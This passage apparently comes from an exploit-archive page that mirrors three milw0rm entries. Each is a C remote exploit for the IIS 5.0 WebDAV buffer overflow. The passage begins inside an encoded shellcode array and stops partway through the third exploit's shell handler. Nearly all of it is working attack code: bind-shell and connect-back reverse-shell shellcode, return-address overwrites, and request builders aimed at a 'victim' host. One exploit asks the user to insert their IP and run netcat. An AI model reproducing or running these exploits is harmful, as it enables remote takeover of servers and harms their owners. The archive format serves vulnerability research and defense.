"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
* xor al, al
* inc al
* repnz scasb
* jmp edi
*/

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv) 
{

unsigned long ret;
unsigned short port;
int tport, bport, s, i, j, r, rt=0;
struct hostent *h;
struct sockaddr_in dst;
char buffer[MAXBUF];

if (argc < 2 || argc > 5) 
{
printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
exit(-1);
}

// Default target port = 80
if (argc > 2)
tport = atoi(argv[2]);
else
tport = 80;

// Default bind port = 31337
if (argc > 3)
bport = atoi(argv[3]);
else
bport = 31337;

// Default ret value = RET
if (argc > 4)
ret = strtoul(argv[4], NULL, 16);
else
ret = RET;

if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 ) 
{
fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
exit(-2);
}

// Shellcode patching
port = htons(bport);
port ^= 0x9999;

if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) ) 
{
fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n");
exit(-3);
}

*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
// If the last two items contain any null-bytes, exploit will fail.
// WARNING: this check is not performed here. Be careful and check it for yourself!

// Resolve hostname
printf("[*] Resolving hostname ...\n");
if ((h = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "%s: unknown hostname\n", argv[1]);
exit(-4);
}

bcopy(h->h_addr, &dst.sin_addr, h->h_length);
dst.sin_family = AF_INET;
dst.sin_port = htons(tport);

// Socket creation
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
{
perror("Failed to create socket");
exit(-5);
}

// Connection
if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
{
perror("Failed to connect");
exit(-6);
}

// Build malicious string...
printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff); 

bzero(buffer, MAXBUF);
strcpy(buffer, "SEARCH /");

i = strlen(buffer);
buffer[i] = NOP; // Align for RET overwrite

// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-) 
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;

// The rest is padded with NOP's. RET address should point to this zone!
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;

// Then we skip the body of the HTTP request
memcpy(&buffer[j], jumpcode, strlen(jumpcode));

strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
strcpy(buffer+strlen(buffer), body);

// This byte is used to mark the beginning of the shellcode
memset(buffer+strlen(buffer), 0x01, 1);

// And finally, we land into our shellcode
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);

// Send request
if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-7);
}

printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

// Receive response
while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
rt += r;
// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF
// and an overflow would occur here. Yes, I'm lazy... :-)

buffer[rt] = '\0';

if (rt > 0)
printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
else
printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);

close(s);

}

// milw0rm.com [2003-03-24]
		

- 漏洞信息 (36)

MS Windows WebDav II (New) Remote Root Exploit (EDBID:36)
windows remote
2003-06-01 Verified
80 alumni
N/A [点击下载]
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*	    29/05/2003 - by Alumni -                   */
/*              Microsoft IIS WebDAV New Exploit           */
/*                 spawns shell on port 32768                 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

#include <stdio.h>
#include <winsock.h>
#include <windows.h>

#define SHELLCODELEN	753
#define NOP				0x90
#define BUFFERLEN		1024
#define RET				0x41424344

#define GMHOFF	30
#define GPAOFF	38
#define IPOFF	161
#define DEFPORT	32768


//#define DEBUGGEE_FLOW	// for debug only

#ifdef DEBUGGEE_FLOW
#define GMH		(long)GetModuleHandle
#define GPA		(long)GetProcAddress
#else
#define GMH		0x0100107C	// GetModuleHandle@
#define GPA		0x01001034	// GetProcAddress@
#endif


#define XOROFF	11
#define SOFF	16


char prologue[] =
"\xEB\x03"	// jmp $+3
"\x58"		// pop eax
"\x50"		// push eax
"\xC3"		// retn
"\xE8\xF8\xFF\xFF\xFF"	// call $-3
"\xB2"		// mov dl, %key

"\x90"		// %key
"\x33\xC9"	// xor ecx, ecx
"\x66\xB9"	// mov cx, shellcodesize

"\x04\x03"	// shellcodesize = hex(SHELLCODELEN)
"\x04\x14"	// add al, 0x14
"\x30\x10"	// xor byte ptr[eax], dl
"\x40"		// inc eax
"\x66\x49"	// dec cx
"\x67\xE3\x02"	// jcxz $+5
"\xEB\xF6"	// jmp $-8
;


char shellcode[SHELLCODELEN+1] =
"\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80"
"\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46"
"\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46"
"\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81"
"\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4"
"\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0"
"\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b"
"\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b"
"\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00"
"\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2"
"\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b"
"\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b"
"\xd6\x83\xc2\x14\xb8"
"\x7f\x00\x00\x01"		// put your ip here (run netcat before, 
e.g. 127.0.0.1)
"\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8"
"\x80\x00"			// specify connectious port here (e.g. 
32768)
"\x66\x89\x42"
"\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76"
"\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2"
"\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84"
"\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00"
"\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52"
"\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00"
"\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b"
"\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43"
"\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7"
"\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47"
"\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00"
"\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00"
"\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b"
"\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff"
"\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7"
"\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7"
"\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c"
"\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90"
"\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a"
"\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52"
"\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff"
"\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81"
"\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc"
"\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08"
"\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3"
"\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1"
"\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00"
"\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00"
"\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b"
"\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08"
"\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5"
"\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56"
"\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff"
"\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c"
"\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65"
"\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65"
"\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b"
"\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e"
"\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c"
"\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c"
"\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65"
"\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00"
"\x52\x65\x61\x64\x46\x69\x6c\x65\x00";


char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest 
xmlns:g=\"DAV:\">\r\n"
				"<g:sql>\r\nSelect \"DAV:displayname\" 
from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


long retaddr, buffsize;
char* buffer;



unsigned long getlocalhostip()
{
	char buff[128];
	in_addr inaddr;
	if(!gethostname(buff,128))
	{
		memcpy(&inaddr,gethostbyname(buff)->h_addr,4);
		return(inet_addr(inet_ntoa(inaddr)));
	}
	return (-1);
}



ULONG WINAPI AcceptThread(LPVOID lpParam)
{
	int ln1;
	unsigned long slisten, sacc;
	sockaddr_in saddrin;
	
	slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (slisten!=INVALID_SOCKET)
	{
		saddrin.sin_addr.s_addr = INADDR_ANY;
		saddrin.sin_family = AF_INET;
		saddrin.sin_port = htons(DEFPORT);
		bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin));
		listen(slisten,5);
		while (1)
		{
			ln1 = sizeof(saddrin);
			sacc = accept(slisten,(struct sockaddr*)
&saddrin,&ln1);
			if (sacc!=INVALID_SOCKET)
			{
				printf("\n\nShell succesfully spawned on 
remote host\nNetcat to %d",DEFPORT);
				ExitProcess(0);
			}
		}
	}
	return (1);
}


ULONG SendRequest (char* sHost, int iPort)
{
	char* buffsend;
	struct sockaddr_in saddr_in;
	int timeout;
	unsigned long sock;

	buffsend = (char*)malloc(buffsize+256);
	memset(buffsend,0,buffsize+256);
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	saddr_in.sin_addr.s_addr = inet_addr(sHost);
	saddr_in.sin_family = AF_INET;
	saddr_in.sin_port = htons(iPort);
	if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in)))
	{
		timeout = 5000;
		setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)
&timeout,sizeof(timeout));
		setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)
&timeout,sizeof(timeout));
		sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent-
Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen
(buffer),xmlbody,buffer);
		send (sock,buffsend,strlen(buffsend),0);
		closesocket(sock);
	}
	else return(1);
	
	return (0);
}


void dispUsage(char* str1)
{
	printf ("IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n");
	printf ("Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>]
\n\n",str1);
	return;
}

int main(int argc, char** argv)
{
	unsigned long uThread;
	int prologuelen = 0, i;
	char xorkey = 0;
	long *ptr1;
	WSADATA wsadata;

	WSAStartup(MAKEWORD(2,0),&wsadata);
	buffsize = BUFFERLEN;
	retaddr = RET;

#ifndef DEBUGGEE_FLOW
	if (argc<3)
	{
		dispUsage(argv[0]);
		return (1);
	}
	if (argc>=4) buffsize = atoi(argv[3]);
	if (argc>=5) retaddr = atol(argv[4]);
#endif
	
	buffer = (char*) malloc(buffsize+1);
	ptr1 = (long*)buffer;
	memset(buffer,0,buffsize);
	CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
AcceptThread,NULL,NULL,&uThread);
	
	*(long*)(shellcode+GMHOFF) = GMH;
	*(long*)(shellcode+GPAOFF) = GPA;
	*(long*)(shellcode+IPOFF) = getlocalhostip();

	for (i=0;i<256;i++)
	{
		int iBool = 1, j;
		for (j=0;j<SHELLCODELEN;j++)
			if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d 
|| (shellcode[j]^i)==0x0a) iBool = 0;
		if (iBool)
		{
			xorkey = i;
			break;
		}
	}

	for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey;
	for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP;
	prologue[XOROFF] = xorkey;
	*(short int*)(prologue+SOFF) = SHELLCODELEN;

	strncat(buffer,prologue,buffsize);
	
	prologuelen = strlen(buffer);
	for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] = 
shellcode[i-prologuelen];
	prologuelen = strlen(buffer);
	buffer[prologuelen] = NOP;
	buffer[prologuelen+1] = NOP;
	buffer[prologuelen+2] = NOP;
	buffer[prologuelen+3] = NOP;
	for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr))  *
(long*)(buffer+i) = retaddr;
	buffer[buffsize] = 0;

	printf ("%s",buffer);


#ifdef DEBUGGEE_FLOW
	__asm {
		mov eax, ptr1
		call eax
	}
#else
	SendRequest(argv[1],atoi(argv[2]));
#endif

	WSACleanup();
	return (0);
}


// milw0rm.com [2003-06-01]
		

- 漏洞信息 (51)

MS Windows WebDav III remote root Exploit (xwdav) (EDBID:51)
windows remote
2003-07-08 Verified
80 Schizoprenic
N/A [点击下载]
/*
 * IIS 5.0 WebDAV Exploit Xnuxer Lab
 * By Schizoprenic, Copyright (c) 2003
 * WebDAV exploit without netcat or telnet and with pretty magic number as RET
 */

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define  RET             0xc9c9   
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
 
unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
 
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
              "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
              "</g:searchrequest>\r\n";
 
void usage(char *prog)
{
   printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
          "Bug overflow NTDLL.DLL\n"
          "Usage: %s <victim>\n", prog);
   exit(-1);
}
 
void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024];
 int n;
 
 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);
 
  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
 
  if( FD_ISSET(sock, &fd_read) ) {
